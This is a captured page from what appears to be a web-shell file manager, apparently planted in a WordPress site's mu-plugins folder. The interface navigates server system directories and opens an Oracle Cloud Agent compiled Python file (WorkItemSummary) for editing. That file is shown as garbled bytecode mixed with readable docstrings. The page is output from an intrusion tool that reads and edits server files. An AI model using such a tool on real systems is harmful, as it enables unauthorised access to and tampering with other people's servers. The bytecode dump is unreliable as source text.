📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
jms
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/jms/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: work_item_summary.pyc
a O��f�! � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdZdZdZdZdZ dZ d d � Zedd� �Z e jd d� �Z edd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zdd� Zdd � Zd!d"� Zd#S )$�WorkItemSummaryz; The LCM work request for a JVM installation site. �ACCEPTED�IN_PROGRESS� CANCELING�CANCELED� SUCCEEDED�NEEDS_ATTENTION�RETRYINGc K sP ddddddd�| _ dddd d dd�| _d| _d| _d| _d| _d| _d| _dS ) ab Initializes a new WorkItemSummary object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param id: The value to assign to the id property of this WorkItemSummary. :type id: str :param work_request_id: The value to assign to the work_request_id property of this WorkItemSummary. :type work_request_id: str :param installation_site: The value to assign to the installation_site property of this WorkItemSummary. :type installation_site: oci.jms.models.InstallationSite :param status: The value to assign to the status property of this WorkItemSummary. Allowed values for this property are: "ACCEPTED", "IN_PROGRESS", "CANCELING", "CANCELED", "SUCCEEDED", "NEEDS_ATTENTION", "RETRYING", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type status: str :param retry_count: The value to assign to the retry_count property of this WorkItemSummary. :type retry_count: int :param time_last_updated: The value to assign to the time_last_updated property of this WorkItemSummary. :type time_last_updated: datetime �str�InstallationSite�int�datetime)�id�work_request_id�installation_site�status�retry_count�time_last_updatedr � workRequestId�installationSiter � retryCount�timeLastUpdatedN)� swagger_types� attribute_map�_id�_work_request_id�_installation_site�_status�_retry_count�_time_last_updated)�self�kwargs� r&